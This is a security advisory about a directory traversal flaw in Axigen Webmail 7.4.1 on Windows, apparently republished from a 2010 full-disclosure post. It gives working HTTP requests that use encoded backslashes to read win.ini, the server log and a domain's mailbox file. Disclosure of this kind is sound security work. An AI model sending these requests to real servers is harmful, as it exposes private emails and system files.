Axigen Webmail Directory Traversal Vulnerability

2010.09.22
Credit: Bogdan Calin
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

We are continuing with the list of security vulnerabilities found in a number of web applications while testing our latest version of Acunetix WVS v7 . In this blog post, we will look into the details of a very serious web vulnerability discovered by Acunetix WVS in Axigen. "Axigen is an integrated email, calendaring & collaboration platform, masterfully built on our unique Linux mail server technology, for increased speed & security." Axigen Webmail version 7.4.1 is vulnerable to a directory traversal vulnerability. Only Axigen installations running on Windows platforms are affected. By URL encoding the "\" character to %5C it's possible to bypass the directory traversal protection available in this application. By requesting the following URL (/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini) it's possible to read the contents of file c:\windows\win.ini. Using this encoding trick you can traverse directories and see the contents of any file that is readable by the web server use Here is a sample HTTP request: GET http://192.168.0.222:80/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini HTTP/1.1 Cookie: webmailSession=0; cookieTest=cookiesEnabled; checkOverQuota=0; passwordExpireWarning=0 Host: 192.168.0.222:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) While investigating this alert, I've discovered that this vulnerability is more serious than I initially expected. This is a very serious vulnerability because using information from the log files it's possible to gather enough information to read the file containing all the emails from all the domains hosted on the server. For, example, using an HTTP request like: GET /..%5c..%5c/log/everything.txt HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: 192.168.0.222 Connection: Close Pragma: no-cache you can access the log file. From here you get determine the domain name and using this information you can read the file containing all the emails from this domain: GET /..%5c..%5c/domains/localdomain/00.hsf HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: 192.168.0.222 Connection: Close Pragma: no-cache This vulnerability was reported to the Axigen team on 22/7/2010 via the support system on their website and they were fixed in Axigen version 7.4.2. If you are using Axigen, download the latest version from their website. -- Bogdan Calin - bogdan [at] acunetix.com CTO Acunetix Ltd. - http://www.acunetix.com Acunetix Web Security Blog - http://www.acunetix.com/blog Follow us on Twitter - http://www.twitter.com/acunetix _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

References:

http://www.vupen.com/english/advisories/2010/2415
http://www.axigen.com/press/product-releases/axigen-releases-version-742_74.html
http://xforce.iss.net/xforce/xfdb/61826
http://www.securityfocus.com/bid/43230
http://www.osvdb.org/68027
http://www.acunetix.com/blog/news/directory-traversal-axigen/
http://secunia.com/advisories/41430
http://packetstormsecurity.org/1009-exploits/axigen741-traversal.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top